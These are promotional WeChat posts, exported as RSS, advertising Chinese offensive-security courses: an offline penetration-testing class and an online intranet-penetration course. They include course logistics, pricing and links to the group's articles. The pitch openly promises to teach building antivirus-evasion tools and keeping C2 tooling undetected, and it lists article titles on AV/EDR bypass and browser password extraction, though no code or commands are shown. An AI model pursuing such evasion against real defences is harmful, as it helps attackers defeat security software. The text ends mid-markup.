<img src="https://wechat2rss.xlab.app/img-proxy/?k=ff5c0605&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNEqzwic1qEPvbLJkrBJxF9WYTMY5E7IW9WgERBu1GGUWdWPz0kuJ5yZA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style=""><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 18px;" data-darkreader-inline-color=""><span style="font-size: 22px;">线下就业班</span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">宽字节安全线下培训班 第二期，于 2021 年 11 月 25 号开班。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color="">为什么选择我们</h2><ol data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: decimal;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">宽字节有自己的安全理念，不同于只讲解工具使用的教程，宽字节更<span style="color: rgb(255, 0, 0);" data-darkreader-inline-color=""><strong>注重原理与基础</strong></span>，万丈高楼平地起，我们将带领学员深入漏洞的本质，探索安全的魅力</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">团队有丰富的红蓝对抗经验，一线红队与安全研究的师傅全程线下授课</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">教学内容通俗易懂，贴合实战，<strong>紧密贴合一线攻防人员的需求</strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">宽敞明亮的教室，各种靶机供学员练习，良好的学习氛围</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">大量的信息安全类书籍供学员借阅，内部资料向学员开放</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">有了 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">第一期培训</strong> 的经验，我们重新梳理细化了整个课程体系和教学资料。增加了 <strong><span style="color: rgb(255, 0, 0);font-size: 18px;" data-darkreader-inline-color="">阶梯性教学</span></strong> 和 <strong><span style="color: rgb(255, 0, 0);font-size: 18px;" data-darkreader-inline-color="">分班机</span><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color="">制</span></strong> 。让基础好的同学能够在学习中沉淀更多东西，基础较弱的同学增加大量基础内容的实战训练，快速提升。让学员在完成培训后，能够深入本质，熟悉漏洞的成因，利用与防护规则。独立完成整个渗透测试流程，积累一定的漏洞分析，内网渗透，域渗透的经验，对安全有自己的认识。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">宽字节安全第一期线下培训已经进行了一半了，来一起看看下线培训的情况吧</strong>。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color="">展示</h2><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">内部 Wiki</section></li></ul><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5461658841940532" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1917" src="https://wechat2rss.xlab.app/img-proxy/?k=44c6b017&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNmpibkG0rCL3GslZ9sToCZicwETYc4A4Dl0D7CfibVK1CQJNRSLvU6D7pw%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6217783505154639" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1552" src="https://wechat2rss.xlab.app/img-proxy/?k=a0c6e981&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNvDRdC3f6wzib6zQu1yYPl4GwOpAEhQN0DgoEaISXKdfzv2vRJ3PNXicA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.8030203545633617" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1523" src="https://wechat2rss.xlab.app/img-proxy/?k=cee918c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNRUYHyWficVTdhvGFc39k5bic97aX0Tias4mMoWnfKdE35VdPh7nKojfyQ%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">学习环境</section></li></ul><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin: 0 auto;max-width: 100%;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=d7500abb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNSlmmuibqWLaDwv16icNIRghZVdWNBXOZa1eGXRcYcLktzVugqw6iadfyw%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.46171875" style="display: block;margin: 0 auto;max-width: 100%;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=021e2b57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNswZ8y7H5wXtBCjknpJJz0rPXkt21cFdn6T1BMC8siba8TH0x0t8GEJw%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">学习氛围</section></li></ul><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=bd792942&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNHZiccmRgibb3pgd9ECvlIPicSibicY0wnPFou7sIicLVXMjPuw5SJ2J6lFQQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=66ccd019&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNhicA41fSCx3l93jh7ehamaFs2Jwo9A5VwYUSAVvyjP8jzghXyIfWHqg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">学员们自行组织相约早晨 7点多 提前到教室学习，学到晚上十点以后走已经成了大家的日常，无任何强制性，全凭大家对网络安全的热爱</p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="2.132492113564669" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="317" src="https://wechat2rss.xlab.app/img-proxy/?k=38c9c5d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNZTibeTP0NTqbTaPxrz5zGShSvabCNXMICcibjsVNVQlR17BssG0VLB3Q%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">学员笔记</section></li></ul><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.39803625377643503" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1324" src="https://wechat2rss.xlab.app/img-proxy/?k=5619222e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNYaZsyhX7ScbyUV75ibgTvcRAmjuEWEwRo4FX1a1y7j5dS4FX0BRbhOA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6163522012578616" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=bc4162ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNxkpZBIJBqcM74km1BX4tyVzgTaF0TdiaX4ctt8x4icG3kpV8W9MQOcnA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5453501722158438" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="1742" src="https://wechat2rss.xlab.app/img-proxy/?k=1caaa897&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaN8ho0mLXdTr5ZoOY5NCXqTyJln42wWKSzBtH9KQiaNeZVXicJpXcbl3icQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6302521008403361" style="display: block;margin: 0 auto;max-width: 100%;" data-type="png" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=73974c62&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNSF9CichAx8CI6ecrmjEjcQy8g2O0yHHQ6mv17TATN4yeoDUPSiaRKZXw%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">学员文章</section></li></ul><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color=""><br/></section><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485254&amp;idx=1&amp;sn=9958bcd7a2750c077a8c66d2bb2da0cb&amp;scene=21#wechat_redirect" textvalue="Windows 名称解析机制" tab="innerlink" data-linktype="2"><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color="">Windows 名称解析机制</span></a><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color=""></span></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485292&amp;idx=1&amp;sn=033571585b6565290b17d85d241d50ba&amp;scene=21#wechat_redirect" textvalue="记一次 mssql 注入到 getshell" tab="innerlink" data-linktype="2"><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color="">记一次 mssql 注入到 getshell</span></a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485235&amp;idx=1&amp;sn=2b68f16d107880349d9e241f6f03db2a&amp;scene=21#wechat_redirect" textvalue="记一次 weblogic 的域渗透实战" tab="innerlink" data-linktype="2"><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color="">记一次 weblogic 的域渗透实战</span></a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485181&amp;idx=1&amp;sn=65ac8c1db32b1e849533438a4d7bba1d&amp;scene=21#wechat_redirect" textvalue="利用安全描述符隐藏服务后门进行权限维持" tab="innerlink" data-linktype="2"><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color="">利用安全描述符隐藏服务后门进行权限维持</span></a><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color=""></span></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;scene=21#wechat_redirect" textvalue="Windows 身份认证" tab="innerlink" data-linktype="2"><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color="">Windows 身份认证</span></a><span style="color: rgb(2, 30, 170);" data-darkreader-inline-color=""></span></p><p data-tool="mdnice编辑器" style="font-size: 16px;margin: 0px;line-height: 26px;color: black;padding: 0px 10px;word-spacing: 0px;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;" data-darkreader-inline-color=""><br/></p><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">住宿环境</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><strong>一人一屋，互不打扰，保证学员的休息质量</strong></p><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin: 0 auto;max-width: 100%;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=8d4fa13f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNib7GXWZtrPBr38drh3v4JgEGpcosdibUVToYrOn5VyZrowWmKjgbymcg%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="1.3333333333333333" style="display: block;margin: 0 auto;max-width: 100%;" data-type="jpeg" data-w="960" src="https://wechat2rss.xlab.app/img-proxy/?k=fc5a4d6f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNxicNvMjeG68eicVd8EPVVghVyQvwcicOy2QosABw32csuGCqztBKNSTzg%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">实战项目</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">涉密，暂不展示。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color="">上课时间</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">上课时间为每周周一到周六，早晨九点到下午五点三十分，晚上为晚自习时间，用于大家复习与练习。总时常 4 个半月 到 5 个月。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color="">课程费用</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">课程定价 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">24888</strong>，<span style="font-size: 18px;"><strong><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color=""></span></strong><strong><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color="">十一假期结束前报名立减1000</span><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color=""></span></strong></span>，加入即送宽字节安全知识星球名额，涉及<strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">java安全，红蓝对抗，内网渗透，漏洞研究等安全领域</strong>，星球长期更新，欢迎各位大佬加入交流。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color="">联系我们</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485438">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a23e03b6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485438%26idx%3D2%26sn%3Dba0c436a8656b65a90a120250a6670be%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Sep 2021 09:00:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节首期内网渗透线上课开班啦！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=3&amp;sn=663da8762314aff8bcf0e359b1107f0f</link>
      <description>前言宽字节安全首次推出 内网渗透 课程。系统性的讲解 内网渗透 从 0 到 1 的攻击手法，深入各个安全机制</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-09-30 09:00</span> <span style="display: inline-block;"></span>
</p>

<p>前言宽字节安全首次推出 内网渗透 课程。系统性的讲解 内网渗透 从 0 到 1 的攻击手法，深入各个安全机制</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=d6936278&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaN1ma62yS0L4kIfvqf941UkOsgsDKJH2ibE5JsWtPtDtTb6CPXicNTRjIw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style=""><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>前言</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-indent: 2em;" data-darkreader-inline-color="">宽字节安全首次推出 <code style="font-size: 14px;overflow-wrap: break-word;padding: 2px 4px;border-radius: 4px;margin: 0px 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;word-break: break-all;" data-darkreader-inline-color="" data-darkreader-inline-bgcolor="">内网渗透</code> 课程。系统性的讲解 内网渗透 从 0 到 1 的攻击手法，深入各个安全机制，从基础开始，探索内网渗透的安全对抗。</section><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>课程优势</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-indent: 2em;" data-darkreader-inline-color="">内网渗透课程体系设计之初，我们拟定了多个版本，最终确定下来两个大方向，<strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">基础</strong> 与 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">实战</strong>，基础是否牢固决定了你在一个点上能走多远，课程中会尽可能少的讲解工具的使用，直接学习相关工具的原理，重点在探索各个攻击是如何实现的，扎实的基础决定了是否可以将各个攻击手法串联利用，课程中不会重点讲解各个高危漏洞的利用方式，我们更倾向探讨漏洞的成因以及全补丁环境下的横向权限扩充。所有课程内容紧密贴合实战，重点介绍实战中常用的手法和思路。</section><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-indent: 2em;" data-darkreader-inline-color="">该门课你可以掌握到：<span style="color: rgb(255, 0, 0);" data-darkreader-inline-color=""><strong>内网渗透的各类手法与思路</strong>，<strong>权限的快速扩充</strong>，<strong>全补丁环境下的域渗透</strong></span>过程等等，更<span style="color: rgb(255, 0, 0);" data-darkreader-inline-color=""><strong>深入学习 windows 机制</strong>，<strong>完成自己的免杀工具</strong>，<strong>对抗各类杀毒软件</strong></span>，让你的 C2 和 各种提权工具不再苦于一上传就被查杀的困扰。</section><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>为啥选择我们</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-indent: 2em;" data-darkreader-inline-color="">宽字节团队具有大量的知识积累与沉淀，具有丰富的实战经验，多次挖掘国内外大厂高危漏洞 0day，数次填补技术空白，<strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">说的再好听不如甩几篇技术文章来的直接</strong>。</section><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484454&amp;idx=1&amp;sn=bedd0331a3e7cfe561d13c72d301d477&amp;scene=21#wechat_redirect" textvalue="渗透小记 - 中继和委派的实战利用" tab="innerlink" data-linktype="2">渗透小记 - 中继和委派的实战利用</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484864&amp;idx=1&amp;sn=94260cb4a4e643764f4cfd3565ae799b&amp;scene=21#wechat_redirect" style="text-decoration: none;color: rgb(30, 107, 184);overflow-wrap: break-word;font-weight: bold;border-bottom: 1px solid rgb(30, 107, 184);" data-linktype="2" data-darkreader-inline-color="" data-darkreader-inline-border-bottom=""></a><a href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484864&amp;idx=1&amp;sn=94260cb4a4e643764f4cfd3565ae799b&amp;scene=21#wechat_redirect" data-linktype="2">[域渗透] SQLSERVER 结合中继与委派</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484911&amp;idx=1&amp;sn=8cbeccd4a691e81adb7912ac5cd37be5&amp;scene=21#wechat_redirect" textvalue="结合 Artifact Kit 和 Syswhispers 绕过AV/EDR" tab="innerlink" data-linktype="2">结合 Artifact Kit 和 Syswhispers 绕过AV/EDR</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247483700&amp;idx=1&amp;sn=1cf11781d7557af846a91380b5ecdabb&amp;scene=21#wechat_redirect" textvalue="CobaltStrike Powershell Bypass AV" tab="innerlink" data-linktype="2">CobaltStrike Powershell Bypass AV</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484875&amp;idx=1&amp;sn=4d938a630724debcc9e69f7b73f8fdbe&amp;scene=21#wechat_redirect" textvalue="从原理对抗 CobaltStrikeScan" tab="innerlink" data-linktype="2">从原理对抗 CobaltStrikeScan</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484824&amp;idx=1&amp;sn=ea0cbec76e6eb98003d9d786444362c8&amp;scene=21#wechat_redirect" textvalue="免杀任意EXE" tab="innerlink" data-linktype="2">免杀任意EXE</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484788&amp;idx=1&amp;sn=a0d4522394b73461452f078a9503aadb&amp;scene=21#wechat_redirect" textvalue="FireFox 密码获取" tab="innerlink" data-linktype="2">FireFox 密码获取</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color=""><a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247484768&amp;idx=1&amp;sn=7638068866e4cb5dc60b95a83caa1f09&amp;scene=21#wechat_redirect" textvalue="Chrome浏览器取证分析" tab="innerlink" data-linktype="2">Chrome浏览器取证分析</a></p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">更多高质量技术文章请参考公众号历史文章。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 